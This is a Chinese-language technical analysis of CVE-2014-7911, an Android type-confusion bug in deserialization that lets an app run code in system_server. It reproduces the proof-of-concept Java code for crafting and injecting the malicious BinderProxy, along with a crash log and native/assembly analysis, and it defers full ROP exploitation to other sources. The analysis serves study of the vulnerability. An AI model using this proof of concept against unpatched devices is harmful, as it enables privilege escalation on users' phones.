CVE-2014-7911是由Jann Horn發現的一個有關安卓的提權漏洞,該漏洞允許惡意應用從普通應用權限提權到system用戶執行命令,漏洞信息與POC見(1]。漏洞的成因源于在安卓系統(<5.0)中,java.io.ObjectInputStream并未校驗輸入的java對象是否是實際可序列化的。攻擊者因此可以構建一個不可序列化的java對象實例,惡意構建其成員變量,當該對象實例被ObjectInputStream反序列化時,將發生類型混淆,對象的Field被視為由本地代碼處理的指針,使攻擊者獲得控制權。
在Jann Horm給出的漏洞信息與POC中(1],向system_server
傳入的是不可序列化的android.os.BinderProxy
對象實例,其成員變量在反序列化時發生類型混淆,由于BinderProxy
的finalize方法包含本地代碼,于是在本地代碼執行時將成員變量強制轉換為指針,注意到成員變量是攻擊者可控的,也就意味著攻擊者可以控制該指針,使其指向攻擊者可控的地址空間,最終獲得在system_server(uid=1000)
中執行代碼的權限。下面主要結合POC對漏洞進行詳細分析,由于筆者之前對相關的Java序列化、Android binder
跨進程通信和native代碼都不太熟悉,主要根據參考文獻進行翻譯、整理和理解,不當之處,還請讀者海涵。
Java層分析:
第一步,構建一可序列化的惡意對象
創建AAdroid.os.BinderProxy
對象,并將其放入Bundle數據中
#!java
Bundle b = new Bundle();
AAdroid.os.BinderProxy evilProxy = new AAdroid.os.BinderProxy();
b.putSerializable("eatthis", evilProxy);
注意AAdroid.os.BinderProxy
是可序列化的,其成員變量mOrgue
就是隨后用于改變程序執行流程的指針。隨后該可序列化的AAdroid.os.BinderProxy
將在傳入system_server
之間修改為不可序列化的Android.os.BinderProxy
對象
#!java
public class BinderProxy implements Serializable {
private static final long serialVersionUID = 0;
//public long mObject = 0x1337beef;
//public long mOrgue = 0x1337beef;
//注意:此處要根據待測的Android版本號設置,在我們待測試的Android 4.4.4中,BinderProxy的這兩個Field為private int,這樣才能保證POC訪問的地址為我們設置的值0x1337beef
private int mObject = 0x1337beef;
private int mOrgue = 0x1337beef;
}
第二步,準備傳入system_server
的數據
主要通過一系列java的反射機制,獲得android.os.IUserManager.Stub,andrioid.os.IUserManager.Stub.Proxy
的Class對象,最終獲得跨進程調用system_server
的IBinder接口——mRemote,以及調用UserManager.setApplicationRestriction
函數的code——TRANSACTION_setApplicationRestriction
,為與system_server
的跨進程Binder通信作準備。
#!java
Class clIUserManager = Class.forName("android.os.IUserManager");
Class[] umSubclasses = clIUserManager.getDeclaredClasses();
System.out.println(umSubclasses.length+" inner classes found");
Class clStub = null;
for (Class c: umSubclasses) {
//it's android.os.IUserManager.Stub
System.out.println("inner class: "+c.getCanonicalName());
if (c.getCanonicalName().equals("android.os.IUserManager.Stub")) {
clStub = c;
}
}
Field fTRANSACTION_setApplicationRestrictions =
clStub.getDeclaredField("TRANSACTION_setApplicationRestrictions");
fTRANSACTION_setApplicationRestrictions.setAccessible(true);
TRANSACTION_setApplicationRestrictions =
fTRANSACTION_setApplicationRestrictions.getInt(null);
UserManager um = (UserManager) ctx.getSystemService(Context.USER_SERVICE);
Field fService = UserManager.class.getDeclaredField("mService");
fService.setAccessible(true);
Object proxy = fService.get(um);
Class[] stSubclasses = clStub.getDeclaredClasses();
System.out.println(stSubclasses.length+" inner classes found");
clProxy = null;
for (Class c: stSubclasses) {
//it's android.os.IUserManager.Stub.Proxy
System.out.println("inner class: "+c.getCanonicalName());
if (c.getCanonicalName().equals("android.os.IUserManager.Stub.Proxy")) {
clProxy = c;
}
}
Field fRemote = clProxy.getDeclaredField("mRemote");
fRemote.setAccessible(true);
mRemote = (IBinder) fRemote.get(proxy);//獲得跨進程調用system_server的IBinder接口
UserHandle me = android.os.Process.myUserHandle();
setApplicationRestrictions(ctx.getPackageName(), b, me.hashCode());
第三步,向system_server
傳入不可序列化的Bundle參數
接下來,調用setApplicationRestrictions
這個函數,并傳入了之前打包evilproxy
的Bundle數據作為參數。將該函數與Android源碼中的setApplicationRestrication
函數[6]對比,主要的區別在于將傳入的Bundle數據進行了修改,將之前可序列化的AAdroid.os.BinderProxy
對象修改為了不可序列化的Android.os.BinderProxy
對象,這樣就將不可序列化的Bundles數據,通過Binder跨進程調用,傳入system_server的Android.os.UserManager.setApplicationRestrictions
方法。
#!java
public void setApplicationRestrictions(java.lang.String packageName, android.os.Bundle restrictions, int
userHandle) throws android.os.RemoteException
{
android.os.Parcel _data = android.os.Parcel.obtain();
android.os.Parcel _reply = android.os.Parcel.obtain();
try {
_data.writeInterfaceToken(DESCRIPTOR);
_data.writeString(packageName);
_data.writeInt(1);
restrictions.writeToParcel(_data, 0);
_data.writeInt(userHandle);
//修改AAdroid.os.BinderProxy為Android.os.BinderProxy
byte[] data = _data.marshall();
for (int i=0; true; i++) {
if (data[i] == 'A' && data[i+1] == 'A' && data[i+2] == 'd' && data[i+3] == 'r') {
data[i] = 'a';
data[i+1] = 'n';
break;
}
}
_data.recycle();
_data = Parcel.obtain();
_data.unmarshall(data, 0, data.length);
/**
通過Binder機制跨進程調用Android.os.UserManager.setApplicationRestrictions方法,
向system_server傳入的是實際不可序列化的Android.os.BinderProxy對象
*/
mRemote.transact(TRANSACTION_setApplicationRestrictions, _data, _reply, 0);
_reply.readException();
}
finally {
_reply.recycle();
_data.recycle();
}
}
安裝POC,啟動Activity
后將其最小化,觸發GC,引起Android系統重啟,從Logcat日志中可以看到,system_server
執行到了之前設置的BinderProxy
對象的0x1337beef
這個值,訪問了不該訪問的內存,導致異常。錯誤信號、寄存器快照和調用棧如下:
#!bash
05-14 18:30:55.974: I/DEBUG(3695): Build fingerprint: 'google/hammerhead/hammerhead:4.4.4/KTU84P/1227136:user/release-keys'
05-14 18:30:55.974: I/DEBUG(3695): Revision: '11'
05-14 18:30:55.974: I/DEBUG(3695): pid: 1552, tid: 1560, name: FinalizerDaemon >>> system_server <<<
05-14 18:30:55.974: I/DEBUG(3695): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 1337bef3
05-14 18:30:56.064: I/DEBUG(3695): r0 1337beef r1 401b89d9 r2 746fdad8 r3 6d4fbdc4
05-14 18:30:56.064: I/DEBUG(3695): r4 401b89d9 r5 1337beef r6 713e3f68 r7 1337beef
05-14 18:30:56.064: I/DEBUG(3695): r8 1337beef r9 74709f68 sl 746fdae8 fp 74aacb24
05-14 18:30:56.064: I/DEBUG(3695): ip 401f08a4 sp 74aacae8 lr 401b7981 pc 40105176 cpsr 200d0030
...
I/DEBUG ( 241): backtrace:
I/DEBUG ( 241): #00 pc 0000d176 /system/lib/libutils.so (android::RefBase::decStrong(void const*) const+3)
I/DEBUG ( 241): #01 pc 0007097d /system/lib/libandroid_runtime.so
I/DEBUG ( 241): #02 pc 0001dbcc /system/lib/libdvm.so (dvmPlatformInvoke+112)
I/DEBUG ( 241): #03 pc 0004e123 /system/lib/libdvm.so (dvmCallJNIMethod(unsigned int const*, JValue*, Method const*, Thread*)+398)
I/DEBUG ( 241): #04 pc 00026fe0 /system/lib/libdvm.so
I/DEBUG ( 241): #05 pc 0002dfa0 /system/lib/libdvm.so (dvmMterpStd(Thread*)+76)
I/DEBUG ( 241): #06 pc 0002b638 /system/lib/libdvm.so (dvmInterpret(Thread*, Method const*, JValue*)+184)
I/DEBUG ( 241): #07 pc 0006057d /system/lib/libdvm.so (dvmCallMethodV(Thread*, Method const*, Object*, bool, JValue*, std::__va_list)+336)
I/DEBUG ( 241): #08 pc 000605a1 /system/lib/libdvm.so (dvmCallMethod(Thread*, Method const*, Object*, JValue*, ...)+20)
I/DEBUG ( 241): #09 pc 00055287 /system/lib/libdvm.so
I/DEBUG ( 241): #10 pc 0000d170 /system/lib/libc.so (__thread_entry+72)
I/DEBUG ( 241): #11 pc 0000d308 /system/lib/libc.so (pthread_create+240)
Native層分析:
假如BinderProxy
可以被序列化,那么在反序列化時,其field引用的對象也會被反序列化;但在POC中ObjectInputStream
反序列化的BinderProxy
對象實例不可序列化,這樣在ObjectInputStream
反序列化BinderProxy
對象時,發生了類型混淆(type confusion),其field被當做隨后由Native代碼處理的指針。這個filed就是之前設置的0x1337beef
,具體而言,就是mOrgue這個變量。
android.os.BinderProxy
的finalize方法調用native代碼,將mOrgue處理為指針.
#!java
protected void finalize() throws Throwable {
destroy();
super.finalize();
return;
Exception exception;
exception;
super.finalize();
throw exception;
}
其中,destroy為native方法
#!java
private final native void destroy();
cpp代碼
#!c++
static void android_os_BinderProxy_destroy(JNIEnv* env, jobject obj)
{
IBinder* b = (IBinder*)
env->GetIntField(obj, gBinderProxyOffsets.mObject);
DeathRecipientList* drl = (DeathRecipientList*)
env->GetIntField(obj, gBinderProxyOffsets.mOrgue);
LOGDEATH("Destroying BinderProxy %p: binder=%p drl=%p\n", obj, b, drl);
env->SetIntField(obj, gBinderProxyOffsets.mObject, 0);
env->SetIntField(obj, gBinderProxyOffsets.mOrgue, 0);
drl->decStrong((void*)javaObjectForIBinder);
b->decStrong((void*)javaObjectForIBinder);
IPCThreadState::self()->flushCommands();
}
最終native代碼調用上述decStrong
方法,從
#!java
DeathRecipientList* drl = (DeathRecipientList*)
env->GetIntField(obj, gBinderProxyOffsets.mOrgue);
這一行可以看出,drl就是mOrgue,可以被攻擊者控制。 所以,drl->decStrong
方法調用使用的this指針可由攻擊者控制。
再看一下RefBase類中的decStrong方法
#!c++
void RefBase::decStrong(const void* id) const
{
weakref_impl* const refs = mRefs;
refs->removeStrongRef(id);
const int32_t c = android_atomic_dec(&refs->mStrong);
#if PRINT_REFS
ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c);
#endif
ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs);
if (c == 1) {
refs->mBase->onLastStrongRef(id);
if ((refs->mFlags&OBJECT_LIFETIME_MASK) == OBJECT_LIFETIME_STRONG) {
delete this;
}
}
refs->decWeak(id);
}
注意上述refs->mBase->onLastStrongRef(id)
最終導致代碼執行。
匯編代碼分析:
下面看一下發生異常時最后調用的RefBase:decStrong
的匯編代碼。將libutils.so
拖入IDA Pro,查看Android::RefBase::decStrong
函數。分析時需要牢記的是,攻擊者能夠控制r0(this指針)
首先對r0的使用,是在decStrong的前下面三行代碼之中
#!c++
weakref_impl* const refs = mRefs;
refs->removeStrongRef(id);
const int32_t c = android_atomic_dec(&refs->mStrong);
對應的匯編代碼如下
ldr r4, [r0, #4] # r0為this指針,r4為mRefs
mov r6, r1
mov r0, r4
blx <android_atomic_dec ()>
首先,mRefs被加載到r4。(r0是drl的this指針,mRefs是虛函數表之后的第一個私有變量,因此mRefs為r0+4所指向的內容)
然后,android_atomic_dec函數被調用,傳入參數&refs->mStrong.
#!c++
const int32_t c = android_atomic_dec(&refs->mStrong);
這被翻譯為
#bash
mov r0, r4 # r4指向mStrong,r0指向mStrong
blx <android_atomic_dec ()>
作為函數參數,上述r0就是&refs->mStrong
。注意,mStrong是refs(類weakref_impl
)的第一個成員變量,由于weakref_impl
沒有虛函數,所以沒有虛函數表,因此mStrong就是r4所指向的內容。
另外,refs->removeStrongRef(id);
這一行并沒有出現在匯編代碼中,因為這個函數為空實現,編譯器進行了優化。如下所示。
#!c++
void removeStrongRef(const void* /*id*/) { }
在調用android_atomic_dec后,出現的是以下代碼
#!c++
if (c == 1) {
refs->mBase->onLastStrongRef(id);
對應的匯編代碼
#!bash
cmp r0, #1 # r0 = refs->mStrong
bne.n d1ea
ldr r0, [r4, #8] # r4 = &refs->mStrong
mov r1, r6
ldr r3, [r0, #0]
ldr r2, [r3, #12]
blx r2
注意,android_atomic_dec
函數執行強引用計數減1,返回的是執行減1操作之前所指定的內存地址存放的值。為了調用refs->mBase->onLastStrongRef(id)
(即:blx r2
),攻擊者需要使refs->mStrong
為1.
至此,可以看出攻擊者為了實現代碼執行,需要滿足如下約束條件:
mOrgue
,第一個可控的指針,在進入decStrong
函數時的r0)必須指向可讀的內存區域;refs->mStrong
必須為1;refs->mBase->onLastStrongRef(id)
需要執行成功。并最終指向可執行的內存區域。即滿足and
#!c++
if(*(*(mOrgue+4))==1){
refs = *(mOrgue+4)
r2 = *(*(*(refs+8))+12)
blx r2 ----->獲取控制權
}
除此以外,攻擊者還必須克服Android中的漏洞緩解技術——ASLR和DEP。
為了成功獲得任意代碼執行,攻擊者可以使用堆噴射、堆棧轉移(stack pivoting)和ROP等技術。受限于筆者目前水平,這里就不再分析了,具體分析和retme大牛的POC可參見[2,3,4]。
值得注意的是,盡管Android采用了ASLR機制,但為了獲得正確的地址,可以基于這樣一個事實:system_server
和攻擊者app都是從同一個進程-Zygote fork
而來,具有相同的基址,攻擊者通過分析自己進程的map文件(位于/proc/system_server
以及所加載模塊的內存布局。
另外一個有趣的話題是,洞主Jann Horn對PAN的分析進行了評論(2],認為不需要復雜的ROP gadgets就可以實現命令執行,而PAN對此進行了澄清。這從側面反映了漏洞利用技術也是一門大的學問,有時即使漏洞發現者也未必能夠真正理解漏洞利用的挑戰。
最后Jann Horn談到了發現此漏洞的靈感(5],源于他在大學時聽到的一次講座,涉及到某個PHP web應用在反序列化攻擊者輸入數據時出現的漏洞,這使他思考其他應用是否也有類似的問題。他知道Java的反序列化由ObjectInputStream
處理不可信的輸入數據,android也許忘了進行檢查。是的,漏洞就在那里。
參考文獻
(1] http://seclists.org/fulldisclosure/2014/Nov/51
(3] https://github.com/retme7/CVE-2014-7911_poc
(4] https://github.com/retme7/My-Slides/blob/master/xKungfooSH%40retme.pdf
(5] https://www.reddit.com/r/netsec/comments/2mr9cz/cve20147911_android_50_privilege_escalation_using/\